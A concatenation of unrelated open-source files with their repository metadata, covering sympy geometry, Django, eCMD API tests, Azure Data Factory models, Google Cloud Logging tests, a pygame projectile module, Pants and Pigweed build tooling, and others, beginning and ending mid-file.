>>> p1, p2 = Point(1, 1), Point(13, 5)
>>> p1.midpoint(p2)
Point(7, 3)
"""
return Point([simplify((a + b)*S.Half) for a, b in zip(self, p)])
def evalf(self):
"""Evaluate the coordinates of the point.
This method will, where possible, create and return a new Point
where the coordinates are evaluated as floating point numbers.
Returns
-------
point : Point
Examples
--------
>>> from sympy import Point, Rational
>>> p1 = Point(Rational(1, 2), Rational(3, 2))
>>> p1
Point(1/2, 3/2)
>>> p1.evalf()
Point(0.5, 1.5)
"""
return Point([x.evalf() for x in self])
def intersection(self, o):
"""The intersection between this point and another point.
Parameters
----------
other : Point
Returns
-------
intersection : list of Points
Notes
-----
The return value will either be an empty list if there is no
intersection, otherwise it will contain this point.
Examples
--------
>>> from sympy import Point
>>> p1, p2, p3 = Point(0, 0), Point(1, 1), Point(0, 0)
>>> p1.intersection(p2)
[]
>>> p1.intersection(p3)
[Point(0, 0)]
"""
if isinstance(o, Point):
if self == o:
return [self]
return []
return o.intersection(self)
@property
def length(self):
return S.Zero
def __len__(self):
return 1
def __add__(self, other):
"""Add two points, or add a factor to this point's coordinates."""
if isinstance(other, Point):
if len(other.args) == len(self.args):
return Point( [simplify(a + b) for a, b in zip(self, other)] )
else:
raise TypeError("Points must have the same number of dimensions")
else:
raise ValueError('Cannot add non-Point, %s, to a Point' % other)
other = sympify(other)
return Point([simplify(a + other) for a in self])
def __sub__(self, other):
"""Subtract two points, or subtract a factor from this point's
coordinates."""
return self + (-other)
def __mul__(self, factor):
"""Multiply point's coordinates by a factor."""
factor = sympify(factor)
return Point([x*factor for x in self])
def __div__(self, divisor):
"""Divide point's coordinates by a factor."""
divisor = sympify(divisor)
return Point([x/divisor for x in self])
def __neg__(self):
"""Negate the point."""
return Point([-x for x in self])
def __abs__(self):
"""Returns the distance between this point and the origin."""
origin = Point([0]*len(self.args))
return Point.distance(origin, self)
|
{
"content_hash": "774c19fcda38c2482e1b9f02f42beb30",
"timestamp": "",
"source": "github",
"line_count": 366,
"max_line_length": 88,
"avg_line_length": 29.204918032786885,
"alnum_prop": 0.5301712040415381,
"repo_name": "Cuuuurzel/KiPyCalc",
"id": "1204ef9a5e080d25abea473d5f135772eab3a191",
"size": "10689",
"binary": false,
"copies": "2",
"ref": "refs/heads/master",
"path": "sympy_old/geometry/point.py",
"mode": "33261",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "20218182"
},
{
"name": "R",
"bytes": "1879"
},
{
"name": "XSLT",
"bytes": "732404"
}
],
"symlink_target": ""
}
|
import os
import sys
if __name__ == "__main__":
os.environ.setdefault("DJANGO_SETTINGS_MODULE", "settings.remote")
from django.core.management import execute_from_command_line
execute_from_command_line(sys.argv)
|
{
"content_hash": "048602c90128e8afa4b31c59a1dfc861",
"timestamp": "",
"source": "github",
"line_count": 9,
"max_line_length": 70,
"avg_line_length": 25.22222222222222,
"alnum_prop": 0.7092511013215859,
"repo_name": "mhfowler/mhfowler",
"id": "7f1f1ac1aa18550c284bded223c2db948c2f9547",
"size": "249",
"binary": false,
"copies": "4",
"ref": "refs/heads/master",
"path": "remote_manage.py",
"mode": "33261",
"license": "mit",
"language": [
{
"name": "CSS",
"bytes": "624577"
},
{
"name": "HTML",
"bytes": "242816"
},
{
"name": "JavaScript",
"bytes": "147886"
},
{
"name": "Makefile",
"bytes": "416"
},
{
"name": "PHP",
"bytes": "1097"
},
{
"name": "Python",
"bytes": "120564"
},
{
"name": "Shell",
"bytes": "69"
}
],
"symlink_target": ""
}
|
from pyecmd import *
from ecmd import ecmdDataBuffer
extensions = {}
if hasattr(ecmd, "fapi2InitExtension"):
extensions["fapi2"] = "ver1"
with Ecmd(**extensions):
t = loopTargets("pu", ECMD_SELECTED_TARGETS_LOOP)[0]
data = t.getScom(0x1234)
t.putScom(0x1234, 0x10100000)
# These interfaces may not be defined for some plugins
# Pull them to prevent compile issues
#core_id, thread_id = t.targetToSequenceId()
#unit_id_string = unitIdToString(2)
#clock_state = t.queryClockState("SOMECLOCK")
t.relatedTargets("pu.c")
retval = t.queryFileLocation(ECMD_FILE_SCANDEF, "")
for loc in retval.fileLocations:
testval = loc.textFile + loc.hashFile + retval.version
if "fapi2" in extensions:
try:
t.fapi2GetAttr("ATTR_DOES_NOT_EXIST")
assert(""=="That was supposed to throw!")
except KeyError:
pass
t.fapi2SetAttr("ATTR_CHIP_ID", 42)
assert(42 == t.fapi2GetAttr("ATTR_CHIP_ID"))
# Some buffer tests
b = ecmdDataBuffer(64)
b.setDoubleWord(0, 0x1234567812345678)
assert(convertFromDataBuffer(b).uint == 0x1234567812345678)
b = EcmdBitArray("0x1234567812345678")
assert(convertToDataBuffer(b).getDoubleWord(0) == 0x1234567812345678)
assert(convertToDataBuffer("0x1234567812345678").getDoubleWord(0) == 0x1234567812345678)
assert(convertToDataBuffer(0x1234567812345678).getDoubleWord(0) == 0x1234567812345678)
|
{
"content_hash": "0a1304e9a5cc5ee7f095d2a7659a9456",
"timestamp": "",
"source": "github",
"line_count": 40,
"max_line_length": 93,
"avg_line_length": 37.35,
"alnum_prop": 0.6720214190093708,
"repo_name": "open-power/eCMD",
"id": "a55fd0959d747e01b4c39a11ed38fdde96651bea",
"size": "1494",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "ecmd-core/pyecmd/test_api.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Batchfile",
"bytes": "3531"
},
{
"name": "C",
"bytes": "3222317"
},
{
"name": "C++",
"bytes": "1409530"
},
{
"name": "Makefile",
"bytes": "70737"
},
{
"name": "Perl",
"bytes": "172280"
},
{
"name": "Python",
"bytes": "251984"
},
{
"name": "SWIG",
"bytes": "85194"
},
{
"name": "Shell",
"bytes": "20249"
}
],
"symlink_target": ""
}
|
from .copy_sink import CopySink
class SqlSink(CopySink):
"""A copy activity SQL sink.
:param additional_properties: Unmatched properties from the message are
deserialized this collection
:type additional_properties: dict[str, object]
:param write_batch_size: Write batch size. Type: integer (or Expression
with resultType integer), minimum: 0.
:type write_batch_size: object
:param write_batch_timeout: Write batch timeout. Type: string (or
Expression with resultType string), pattern:
((\\d+)\\.)?(\\d\\d):(60|([0-5][0-9])):(60|([0-5][0-9])).
:type write_batch_timeout: object
:param sink_retry_count: Sink retry count. Type: integer (or Expression
with resultType integer).
:type sink_retry_count: object
:param sink_retry_wait: Sink retry wait. Type: string (or Expression with
resultType string), pattern:
((\\d+)\\.)?(\\d\\d):(60|([0-5][0-9])):(60|([0-5][0-9])).
:type sink_retry_wait: object
:param type: Constant filled by server.
:type type: str
:param sql_writer_stored_procedure_name: SQL writer stored procedure name.
Type: string (or Expression with resultType string).
:type sql_writer_stored_procedure_name: object
:param sql_writer_table_type: SQL writer table type. Type: string (or
Expression with resultType string).
:type sql_writer_table_type: object
:param pre_copy_script: SQL pre-copy script. Type: string (or Expression
with resultType string).
:type pre_copy_script: object
:param stored_procedure_parameters: SQL stored procedure parameters.
:type stored_procedure_parameters: dict[str,
~azure.mgmt.datafactory.models.StoredProcedureParameter]
"""
_validation = {
'type': {'required': True},
}
_attribute_map = {
'additional_properties': {'key': '', 'type': '{object}'},
'write_batch_size': {'key': 'writeBatchSize', 'type': 'object'},
'write_batch_timeout': {'key': 'writeBatchTimeout', 'type': 'object'},
'sink_retry_count': {'key': 'sinkRetryCount', 'type': 'object'},
'sink_retry_wait': {'key': 'sinkRetryWait', 'type': 'object'},
'type': {'key': 'type', 'type': 'str'},
'sql_writer_stored_procedure_name': {'key': 'sqlWriterStoredProcedureName', 'type': 'object'},
'sql_writer_table_type': {'key': 'sqlWriterTableType', 'type': 'object'},
'pre_copy_script': {'key': 'preCopyScript', 'type': 'object'},
'stored_procedure_parameters': {'key': 'storedProcedureParameters', 'type': '{StoredProcedureParameter}'},
}
def __init__(self, additional_properties=None, write_batch_size=None, write_batch_timeout=None, sink_retry_count=None, sink_retry_wait=None, sql_writer_stored_procedure_name=None, sql_writer_table_type=None, pre_copy_script=None, stored_procedure_parameters=None):
super(SqlSink, self).__init__(additional_properties=additional_properties, write_batch_size=write_batch_size, write_batch_timeout=write_batch_timeout, sink_retry_count=sink_retry_count, sink_retry_wait=sink_retry_wait)
self.sql_writer_stored_procedure_name = sql_writer_stored_procedure_name
self.sql_writer_table_type = sql_writer_table_type
self.pre_copy_script = pre_copy_script
self.stored_procedure_parameters = stored_procedure_parameters
self.type = 'SqlSink'
|
{
"content_hash": "146b1d689130d8ae359e1d64dc40e17e",
"timestamp": "",
"source": "github",
"line_count": 63,
"max_line_length": 268,
"avg_line_length": 53.63492063492063,
"alnum_prop": 0.6700207161882213,
"repo_name": "AutorestCI/azure-sdk-for-python",
"id": "88837785773d8659213f1230feda4e9747a87302",
"size": "3853",
"binary": false,
"copies": "2",
"ref": "refs/heads/master",
"path": "azure-mgmt-datafactory/azure/mgmt/datafactory/models/sql_sink.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "34619070"
}
],
"symlink_target": ""
}
|
import logging
import unittest
import mock
class TestAppEngineHandler(unittest.TestCase):
PROJECT = "PROJECT"
def _get_target_class(self):
from google.cloud.logging.handlers import AppEngineHandler
return AppEngineHandler
def _make_one(self, *args, **kw):
return self._get_target_class()(*args, **kw)
def test_constructor_w_gae_standard_env(self):
import sys
from google.cloud.logging_v2.handlers import app_engine
client = mock.Mock(project=self.PROJECT, spec=["project"])
# Verify that project/service/version are picked up from the
# environment.
with mock.patch(
"os.environ",
new={
app_engine._GAE_SERVICE_ENV: "test_service",
app_engine._GAE_VERSION_ENV: "test_version",
},
), mock.patch(
"google.cloud.logging_v2.handlers._monitored_resources.retrieve_metadata_server",
return_value=self.PROJECT,
):
handler = self._make_one(client, transport=_Transport)
self.assertIs(handler.client, client)
self.assertEqual(handler.name, app_engine._DEFAULT_GAE_LOGGER_NAME)
self.assertEqual(handler.resource.type, "gae_app")
self.assertEqual(handler.resource.labels["project_id"], self.PROJECT)
self.assertEqual(handler.resource.labels["module_id"], "test_service")
self.assertEqual(handler.resource.labels["version_id"], "test_version")
self.assertIs(handler.stream, sys.stderr)
def test_constructor_w_gae_flex_env(self):
import io
from google.cloud.logging_v2.handlers import app_engine
client = mock.Mock(project=self.PROJECT, spec=["project"])
name = "test-logger"
stream = io.BytesIO()
# Verify that _GAE_PROJECT_ENV_FLEX environment variable takes
# precedence over _GAE_PROJECT_ENV_STANDARD.
with mock.patch(
"os.environ",
new={
app_engine._GAE_PROJECT_ENV_FLEX: "test_project_2",
app_engine._GAE_PROJECT_ENV_STANDARD: "test_project_should_be_overridden",
app_engine._GAE_SERVICE_ENV: "test_service_2",
app_engine._GAE_VERSION_ENV: "test_version_2",
},
), mock.patch(
"google.cloud.logging_v2.handlers._monitored_resources.retrieve_metadata_server",
return_value=self.PROJECT,
):
handler = self._make_one(
client, name=name, transport=_Transport, stream=stream
)
self.assertIs(handler.client, client)
self.assertEqual(handler.name, name)
self.assertEqual(handler.resource.type, "gae_app")
self.assertEqual(handler.resource.labels["project_id"], self.PROJECT)
self.assertEqual(handler.resource.labels["module_id"], "test_service_2")
self.assertEqual(handler.resource.labels["version_id"], "test_version_2")
self.assertIs(handler.stream, stream)
def test_emit(self):
expected_http_request = {"request_url": "test"}
trace_id = "trace-test"
expected_trace_id = f"projects/{self.PROJECT}/traces/{trace_id}"
get_request_patch = mock.patch(
"google.cloud.logging_v2.handlers.app_engine.get_request_data",
return_value=(expected_http_request, trace_id, None, None),
)
with get_request_patch:
# library integrations mocked to return test data
client = mock.Mock(project=self.PROJECT, spec=["project"])
handler = self._make_one(client, transport=_Transport)
gae_resource = handler.get_gae_resource()
gae_labels = handler.get_gae_labels()
logname = "app"
message = "hello world"
record = logging.LogRecord(
logname, logging, None, None, message, None, None
)
handler.project_id = self.PROJECT
handler.emit(record)
self.assertIs(handler.transport.client, client)
self.assertEqual(handler.transport.name, logname)
self.assertEqual(
handler.transport.send_called_with,
(
record,
message,
gae_resource,
gae_labels,
expected_trace_id,
None,
expected_http_request,
),
)
def test_emit_manual_field_override(self):
from google.cloud.logging_v2.resource import Resource
inferred_http_request = {"request_url": "test"}
inferred_trace_id = "trace-test"
get_request_patch = mock.patch(
"google.cloud.logging_v2.handlers.app_engine.get_request_data",
return_value=(inferred_http_request, inferred_trace_id, None, None),
)
with get_request_patch:
# library integrations mocked to return test data
client = mock.Mock(project=self.PROJECT, spec=["project"])
handler = self._make_one(client, transport=_Transport)
gae_labels = handler.get_gae_labels()
logname = "app"
message = "hello world"
record = logging.LogRecord(
logname, logging, None, None, message, None, None
)
handler.project_id = self.PROJECT
# set attributes manually
expected_trace = "123"
setattr(record, "trace", expected_trace)
expected_span = "456"
setattr(record, "span_id", expected_span)
expected_http = {"reuqest_url": "manual"}
setattr(record, "http_request", expected_http)
expected_resource = Resource(type="test", labels={})
setattr(record, "resource", expected_resource)
additional_labels = {"test-label": "manual"}
expected_labels = dict(gae_labels)
expected_labels.update(additional_labels)
setattr(record, "labels", additional_labels)
handler.emit(record)
self.assertIs(handler.transport.client, client)
self.assertEqual(handler.transport.name, logname)
self.assertEqual(
handler.transport.send_called_with,
(
record,
message,
expected_resource,
expected_labels,
expected_trace,
expected_span,
expected_http,
),
)
def _get_gae_labels_helper(self, trace_id):
get_request_patch = mock.patch(
"google.cloud.logging_v2.handlers.app_engine.get_request_data",
return_value=(None, trace_id, None, None),
)
client = mock.Mock(project=self.PROJECT, spec=["project"])
# The handler actually calls ``get_gae_labels()``.
with get_request_patch as mock_get_request:
handler = self._make_one(client, transport=_Transport)
gae_labels = handler.get_gae_labels()
self.assertEqual(mock_get_request.mock_calls, [mock.call()])
return gae_labels
def test_get_gae_labels_with_label(self):
from google.cloud.logging_v2.handlers import app_engine
trace_id = "test-gae-trace-id"
gae_labels = self._get_gae_labels_helper(trace_id)
expected_labels = {app_engine._TRACE_ID_LABEL: trace_id}
self.assertEqual(gae_labels, expected_labels)
def test_get_gae_labels_without_label(self):
gae_labels = self._get_gae_labels_helper(None)
self.assertEqual(gae_labels, {})
class _Transport(object):
def __init__(self, client, name):
self.client = client
self.name = name
def send(self, record, message, resource, labels, trace, span_id, http_request):
self.send_called_with = (
record,
message,
resource,
labels,
trace,
span_id,
http_request,
)
|
{
"content_hash": "921fc16aeb51f4118d56543b17d03e4e",
"timestamp": "",
"source": "github",
"line_count": 209,
"max_line_length": 93,
"avg_line_length": 38.84688995215311,
"alnum_prop": 0.579012193619904,
"repo_name": "googleapis/python-logging",
"id": "8eedfad9b053db0d3312655d729d37f7e976a149",
"size": "8715",
"binary": false,
"copies": "1",
"ref": "refs/heads/main",
"path": "tests/unit/handlers/test_app_engine.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Dockerfile",
"bytes": "2050"
},
{
"name": "Python",
"bytes": "1895976"
},
{
"name": "Shell",
"bytes": "34102"
}
],
"symlink_target": ""
}
|
import math
import pygame
from lib.Globals import UnitType, Debug, Vars, LoadImage
import lib.Effects
class Projectile(pygame.sprite.Sprite):
""" All projectiles will inherit this class for a basic projectile. """
def __init__(self, d=None, l=-1, offset=0):
pygame.sprite.Sprite.__init__(self)
self.Degrees = d
self.Speed = 6 # Movement per tick
self.Life = l ## Anything higher than -1 will determine how many
## ticks the projectile is alive.
self.Offset = offset # Number of ticks to skip when calculating the start position.
self.image = None
self.rect = None
self.realX = 0.0
self.realY = 0.0
def calculate_path(self):
if self.Degrees is None:
self.Degrees = 0.0
self.Radian = (self.Degrees - 90.0) * (math.pi / 180.0)
## Distance the projectile travels per tick, given the angle above.
self.StepX = self.Speed * math.cos(self.Radian)
self.StepY = self.Speed * math.sin(self.Radian)
while self.Offset > 0:
self.rect.x += self.StepX
self.rect.y += self.StepY
self.Offset -= 1
while self.Offset < 0:
self.rect.x -= self.StepX
self.rect.y -= self.StepY
self.Offset += 1
Debug('Recalculated vector: ({x}, {y})'.format(x=self.StepX, y=self.StepY))
def update(self, nobounds=False):
## Move the projectile keeping in mind the direction.
self.rect.x += self.StepX
self.rect.y += self.StepY
if self.Life > -1:
if self.Life == 0:
self.kill()
else:
self.Life -= 1
def check_bounds(self):
vars = Vars()
if pygame.display.get_surface().get_rect().contains(self.rect):
return True
return False
class Bullet(Projectile):
def __init__(self, t, x, y, d=None, l=-1, offset=0):
Projectile.__init__(self, d, l, offset)
self.Type = t
## Defaults given the unit type that fired the projectile.
if self.Degrees == None:
if self.Type == UnitType.PLAYER:
self.Degrees = 0.0
elif self.Type == UnitType.ENEMY:
self.Degrees = 180.0
else:
self.Degrees = 90.0
## Load the correct image.
if self.Type == UnitType.PLAYER:
self.image = pygame.transform.rotozoom(LoadImage('png/Lasers/laserGreen02.png'), (self.Degrees * -1), 1)
self.Speed = 15
else:
self.image = pygame.transform.rotozoom(LoadImage('png/Lasers/laserRed02.png'), (self.Degrees * -1), 1)
self.Speed = 15
self.rect = self.image.get_rect()
self.rect.centerx = x
self.rect.centery = y
self.calculate_path()
def update(self):
if not self.check_bounds():
self.kill()
else:
Projectile.update(self)
class BulletBomb(Bullet):
def __init__(self, t, x, y, group, d=0, l=90):
Bullet.__init__(self, t, x, y, d, l)
self.Fuse = 20
self.Speed = 1
self.Group = group
def detonate(self):
shrapnel = 8
for n in range(shrapnel):
self.Group.add(BulletBomb(self.Type, self.rect.centerx, self.rect.centery, self.Group, (n * (360.0 / shrapnel)), self.Life - 20))
self.Group.add(Effects.Explosion(self.Type, (self.rect.centerx, self.rect.centery)))
self.kill()
def update(self):
if self.Fuse > 0:
self.Fuse -= 1
Bullet.update(self)
else:
self.detonate()
|
{
"content_hash": "392621af824918a40cafaa67db6634ea",
"timestamp": "",
"source": "github",
"line_count": 115,
"max_line_length": 141,
"avg_line_length": 32.23478260869565,
"alnum_prop": 0.5521985432964661,
"repo_name": "zorchenhimer/NoudaEngine",
"id": "d95e1322076de6f698d2490bfbff467fdc2c9e9a",
"size": "3726",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "lib/Projectiles.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "88342"
}
],
"symlink_target": ""
}
|
from __future__ import (absolute_import, division, generators, nested_scopes, print_function,
unicode_literals, with_statement)
import glob
import os
import shutil
from contextlib import contextmanager
from pex.interpreter import PythonInterpreter
from pants.backend.native.subsystems.native_toolchain import NativeToolchain
from pants.backend.python.python_requirement import PythonRequirement
from pants.backend.python.targets.python_distribution import PythonDistribution
from pants.backend.python.targets.python_requirement_library import PythonRequirementLibrary
from pants.backend.python.tasks.setup_py import SetupPyInvocationEnvironment, SetupPyRunner
from pants.base.build_environment import get_buildroot
from pants.base.exceptions import TargetDefinitionException, TaskError
from pants.base.fingerprint_strategy import DefaultFingerprintStrategy
from pants.build_graph.address import Address
from pants.task.task import Task
from pants.util.contextutil import environment_as
from pants.util.dirutil import safe_mkdir
from pants.util.memo import memoized_method
class BuildLocalPythonDistributions(Task):
"""Create python distributions (.whl) from python_dist targets."""
options_scope = 'python-create-distributions'
@classmethod
def product_types(cls):
# Note that we don't actually place the products in the product map. We stitch
# them into the build graph instead. This is just to force the round engine
# to run this task when dists need to be built.
return [PythonRequirementLibrary, 'local_wheels']
@classmethod
def prepare(cls, options, round_manager):
round_manager.require_data(PythonInterpreter)
@classmethod
def implementation_version(cls):
return super(BuildLocalPythonDistributions, cls).implementation_version() + [('BuildLocalPythonDistributions', 1)]
@classmethod
def subsystem_dependencies(cls):
return super(BuildLocalPythonDistributions, cls).subsystem_dependencies() + (NativeToolchain.scoped(cls),)
@memoized_method
def _native_toolchain_instance(self):
return NativeToolchain.scoped_instance(self)
@property
def cache_target_dirs(self):
return True
@staticmethod
def filter_target(tgt):
return type(tgt) is PythonDistribution
def execute(self):
dist_targets = self.context.targets(self.filter_target)
if dist_targets:
with self.invalidated(dist_targets,
fingerprint_strategy=DefaultFingerprintStrategy(),
invalidate_dependents=True) as invalidation_check:
interpreter = self.context.products.get_data(PythonInterpreter)
for vt in invalidation_check.invalid_vts:
if vt.target.dependencies:
raise TargetDefinitionException(
vt.target, 'The `dependencies` field is disallowed on `python_dist` targets. '
'List any 3rd party requirements in the install_requirements argument '
'of your setup function.'
)
self._create_dist(vt.target, vt.results_dir, interpreter)
local_wheel_products = self.context.products.get('local_wheels')
for vt in invalidation_check.all_vts:
dist = self._get_whl_from_dir(os.path.join(vt.results_dir, 'dist'))
req_lib_addr = Address.parse('{}__req_lib'.format(vt.target.address.spec))
self._inject_synthetic_dist_requirements(dist, req_lib_addr)
# Make any target that depends on the dist depend on the synthetic req_lib,
# for downstream consumption.
for dependent in self.context.build_graph.dependents_of(vt.target.address):
self.context.build_graph.inject_dependency(dependent, req_lib_addr)
local_wheel_products.add(vt.target, os.path.dirname(dist)).append(os.path.basename(dist))
def _copy_sources(self, dist_tgt, dist_target_dir):
# Copy sources and setup.py over to vt results directory for packaging.
# NB: The directory structure of the destination directory needs to match 1:1
# with the directory structure that setup.py expects.
all_sources = list(dist_tgt.sources_relative_to_target_base())
for src_relative_to_target_base in all_sources:
src_rel_to_results_dir = os.path.join(dist_target_dir, src_relative_to_target_base)
safe_mkdir(os.path.dirname(src_rel_to_results_dir))
abs_src_path = os.path.join(get_buildroot(),
dist_tgt.address.spec_path,
src_relative_to_target_base)
shutil.copyfile(abs_src_path, src_rel_to_results_dir)
def _request_single(self, product, subject):
# This is not supposed to be exposed to Tasks yet -- see #4769 to track the
# status of exposing v2 products in v1 tasks.
return self.context._scheduler.product_request(product, [subject])[0]
# FIXME(cosmicexplorer): We should be isolating the path to just our provided
# toolchain, but this causes errors in Travis because distutils looks for
# "x86_64-linux-gnu-gcc" when linking native extensions. We almost definitely
# will need to introduce a subclass of UnixCCompiler and expose it to the
# setup.py to be able to invoke our toolchain on hosts that already have a
# compiler installed. Right now we just put our tools at the end of the PATH.
@contextmanager
def _setup_py_invocation_environment(self):
setup_py_env = self._request_single(
SetupPyInvocationEnvironment, self._native_toolchain_instance())
with environment_as(**setup_py_env.as_env_dict()):
yield
def _create_dist(self, dist_tgt, dist_target_dir, interpreter):
"""Create a .whl file for the specified python_distribution target."""
self._copy_sources(dist_tgt, dist_target_dir)
# TODO(cosmicexplorer): don't invoke the native toolchain unless the current
# dist_tgt.has_native_sources? Would need some way to check whether the
# toolchain is invoked in an integration test.
with self._setup_py_invocation_environment():
# Build a whl using SetupPyRunner and return its absolute path.
setup_runner = SetupPyRunner(dist_target_dir, 'bdist_wheel', interpreter=interpreter)
setup_runner.run()
def _inject_synthetic_dist_requirements(self, dist, req_lib_addr):
"""Inject a synthetic requirements library that references a local wheel.
:param dist: Path of the locally built wheel to reference.
:param req_lib_addr: :class: `Address` to give to the synthetic target.
:return: a :class: `PythonRequirementLibrary` referencing the locally-built wheel.
"""
base = os.path.basename(dist)
whl_dir = os.path.dirname(dist)
whl_metadata = base.split('-')
req_name = '=='.join([whl_metadata[0], whl_metadata[1]])
req = PythonRequirement(req_name, repository=whl_dir)
self.context.build_graph.inject_synthetic_target(req_lib_addr, PythonRequirementLibrary,
requirements=[req])
@staticmethod
def _get_whl_from_dir(install_dir):
"""Return the absolute path of the whl in a setup.py install directory."""
dists = glob.glob(os.path.join(install_dir, '*.whl'))
if len(dists) == 0:
raise TaskError('No distributions were produced by python_create_distribution task.')
if len(dists) > 1:
raise TaskError('Ambiguous local python distributions found: {}'.format(dists))
return dists[0]
|
{
"content_hash": "390bdacaa128bf724cc615d95281a7f7",
"timestamp": "",
"source": "github",
"line_count": 157,
"max_line_length": 118,
"avg_line_length": 47.36942675159236,
"alnum_prop": 0.7131908027430416,
"repo_name": "foursquare/pants",
"id": "b383780e88265a356fdf1c18913c325a35341b8f",
"size": "7584",
"binary": false,
"copies": "1",
"ref": "refs/heads/1.7.0+fsX",
"path": "src/python/pants/backend/python/tasks/build_local_python_distributions.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "C",
"bytes": "343"
},
{
"name": "C++",
"bytes": "1138"
},
{
"name": "CSS",
"bytes": "9444"
},
{
"name": "Dockerfile",
"bytes": "3034"
},
{
"name": "GAP",
"bytes": "1283"
},
{
"name": "Gherkin",
"bytes": "919"
},
{
"name": "Go",
"bytes": "1922"
},
{
"name": "HTML",
"bytes": "49126"
},
{
"name": "Java",
"bytes": "490360"
},
{
"name": "JavaScript",
"bytes": "33289"
},
{
"name": "Python",
"bytes": "5461553"
},
{
"name": "Rust",
"bytes": "443987"
},
{
"name": "Scala",
"bytes": "76065"
},
{
"name": "Shell",
"bytes": "77142"
},
{
"name": "Starlark",
"bytes": "357125"
},
{
"name": "Thrift",
"bytes": "3365"
}
],
"symlink_target": ""
}
|
from ironic.drivers import pxe
from cisco_ironic_contrib.ironic.cimc import boot as cimc_boot
from cisco_ironic_contrib.ironic.cimc import vendor as cimc_vendor
class PXEAndCIMCNeutronDriver(pxe.PXEAndCIMCDriver):
def __init__(self):
super(PXEAndCIMCNeutronDriver, self).__init__()
self.boot = cimc_boot.PXEBoot()
self.vendor = cimc_vendor.CIMCPXEVendorPassthru()
|
{
"content_hash": "9eb0327a74d095cb41d3247b9c6bae2b",
"timestamp": "",
"source": "github",
"line_count": 12,
"max_line_length": 66,
"avg_line_length": 33,
"alnum_prop": 0.7373737373737373,
"repo_name": "Tehsmash/cisco-ironic-contrib",
"id": "bb0456c5cd04bb336fbf93d884713bef5ab461ff",
"size": "978",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "cisco_ironic_contrib/ironic/pxe.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Python",
"bytes": "44648"
},
{
"name": "Shell",
"bytes": "898"
}
],
"symlink_target": ""
}
|
"""Install and check status of CRLSet and download chromium CRLSet."""
import os
import pathlib
import subprocess
from typing import Sequence
import pw_package.git_repo
import pw_package.package_manager
def crlset_tools_repo_path(path: pathlib.Path) -> pathlib.Path:
return path / 'crlset-tools'
def crlset_exec_path(path: pathlib.Path) -> pathlib.Path:
return path / 'crlset_exec'
def crlset_file_path(path: pathlib.Path) -> pathlib.Path:
return path / 'crlset'
class CRLSet(pw_package.package_manager.Package):
"""Install and check status of CRLSet and downloaded CLRSet file."""
def __init__(self, *args, **kwargs):
super().__init__(*args, name='crlset', **kwargs)
self._crlset_tools = pw_package.git_repo.GitRepo(
name='crlset-tools',
url='https://github.com/agl/crlset-tools.git',
commit='1a1019bb500f93bc2b847a57cdbaede847649b99',
)
def status(self, path: pathlib.Path) -> bool:
if not self._crlset_tools.status(crlset_tools_repo_path(path)):
return False
# The executable should have been built and exist.
if not os.path.exists(crlset_exec_path(path)):
return False
# A crlset has been downloaded
if not os.path.exists(crlset_file_path(path)):
return False
return True
def install(self, path: pathlib.Path) -> None:
self._crlset_tools.install(crlset_tools_repo_path(path))
# Build the go tool
subprocess.run(
['go', 'build', '-o',
crlset_exec_path(path), 'crlset.go'],
check=True,
cwd=crlset_tools_repo_path(path))
crlset_tools_exec = crlset_exec_path(path)
if not os.path.exists(crlset_tools_exec):
raise FileNotFoundError('Fail to find crlset executable')
# Download the latest CRLSet with the go tool
with open(crlset_file_path(path), 'wb') as crlset_file:
fetched = subprocess.run([crlset_exec_path(path), 'fetch'],
capture_output=True,
check=True).stdout
crlset_file.write(fetched)
def info(self, path: pathlib.Path) -> Sequence[str]:
return (
f'{self.name} installed in: {path}',
"Enable by running 'gn args out' and adding this line:",
f' pw_tls_client_CRLSET_PATH = "{crlset_file_path(path)}"',
)
pw_package.package_manager.register(CRLSet)
|
{
"content_hash": "a6fb4892e09d334b539e8478354f497b",
"timestamp": "",
"source": "github",
"line_count": 76,
"max_line_length": 72,
"avg_line_length": 33.1578947368421,
"alnum_prop": 0.6095238095238096,
"repo_name": "google/pigweed",
"id": "f17002a2b9e79cfc956a169c109e013ce7fa003c",
"size": "3104",
"binary": false,
"copies": "1",
"ref": "refs/heads/main",
"path": "pw_package/py/pw_package/packages/crlset.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Batchfile",
"bytes": "8654"
},
{
"name": "C",
"bytes": "487991"
},
{
"name": "C++",
"bytes": "6119052"
},
{
"name": "CMake",
"bytes": "288698"
},
{
"name": "CSS",
"bytes": "4820"
},
{
"name": "Go",
"bytes": "18932"
},
{
"name": "HTML",
"bytes": "1194"
},
{
"name": "Java",
"bytes": "327548"
},
{
"name": "JavaScript",
"bytes": "12482"
},
{
"name": "Jinja",
"bytes": "2467"
},
{
"name": "Python",
"bytes": "3578966"
},
{
"name": "Rust",
"bytes": "645"
},
{
"name": "SCSS",
"bytes": "1382"
},
{
"name": "Shell",
"bytes": "22974"
},
{
"name": "Smarty",
"bytes": "692"
},
{
"name": "Starlark",
"bytes": "489444"
},
{
"name": "TypeScript",
"bytes": "235169"
}
],
"symlink_target": ""
}
|
from datetime import datetime, timezone
def from_isoformat(iso):
return datetime.strptime(iso, '%Y-%m-%dT%H:%M:%S.%f')
def utcnow():
return datetime.now(timezone.utc)
|
{
"content_hash": "ddce781a2983e8e504d1a02731400ae4",
"timestamp": "",
"source": "github",
"line_count": 9,
"max_line_length": 57,
"avg_line_length": 19.88888888888889,
"alnum_prop": 0.6871508379888268,
"repo_name": "optiflows/nyuki",
"id": "1b8eaddf47e7f0a5cb80003547b6a16aef4c6903",
"size": "179",
"binary": false,
"copies": "2",
"ref": "refs/heads/master",
"path": "nyuki/utils/dtutils.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Makefile",
"bytes": "106"
},
{
"name": "Python",
"bytes": "217168"
},
{
"name": "Shell",
"bytes": "301"
}
],
"symlink_target": ""
}
|
"""
parser.local.companyParser module (imdb package).
This module provides the functions used to parse the
information about companies in a local installation of the
IMDb database.
Copyright 2008 Davide Alberani <da@erlug.linux.it>
